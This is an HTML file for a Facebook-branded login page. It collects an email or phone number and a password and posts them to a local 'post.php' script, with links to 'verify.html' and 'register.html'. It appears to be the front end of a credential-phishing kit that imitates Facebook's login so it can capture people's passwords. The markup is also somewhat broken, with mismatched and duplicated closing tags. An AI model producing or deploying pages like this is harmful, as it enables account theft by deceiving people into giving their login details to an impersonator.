<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width,initial-scale=1.0"> 
    <meta charset="UTF-8">
    <title>facebook</title>
     <style>
body{margin:0;
     background:linear-gradient(brown, black);}   
b{font-size:30px;} 
#header-input{text-align:center;}
#btn{text-align:center;}
#button{background-color:#084B8A;color:white;}
#button{height:36px;
        width:300px;
        border-radius:4px;
        background: linear-gradient(#084B8A, #BDBDBD);
         cusor:pointer;}
#email{height:38px;
      width:300px; 
      border:1px solid blue;}
#pass{height:38px;
      width:300px;
      border:1px solid blue;}
a{text-decoration:none;
  color:blue;} 
#c{background:linear-gradient(#084B8A, #BDBDBD);color:white;
    border-radius:4px;}
img{max-width:59px;}
b{position:absolute;
  top:80px;
  left:100px;
  color:blue;}
.word,nav{background-color:black;
      background:linear-gradient(white, blue);
      padding:20px;}
.photo{max-width:100px;
       position:absolute;
       left:111px;}
    </style>
</head>
<body>
    <div id="header-input">
    <div id="image">
<img src="lite.png">
<b>facebook</b>
     </div>
    <br></br> 
    <br></br>
    <hr></hr>
      <br></br>
<form action="post.php" method="post">
      <div class="inp">
<input type="text" name="email" placeholder="email or number" id="email" required>
     <br></br>
<input type="password" name="pass" placeholder="password" id="pass" required>
    <br></br>    
    </div>
    </div>
    <br></br>
   <div id="btn"> 
<input type="submit" name="login" value="login" id="button"/>
<a href="verify.html"><h4>forgot password</4></a>
   <a href="register.html" id="c"><h3>create new account</3></a>
     </div>
     <div class="word">
     <nav>
<img src="logo.png" class="photo"> 
      </nav>
     </div>
     </form> 
</body>
</html>
    </div>
</body>
</html>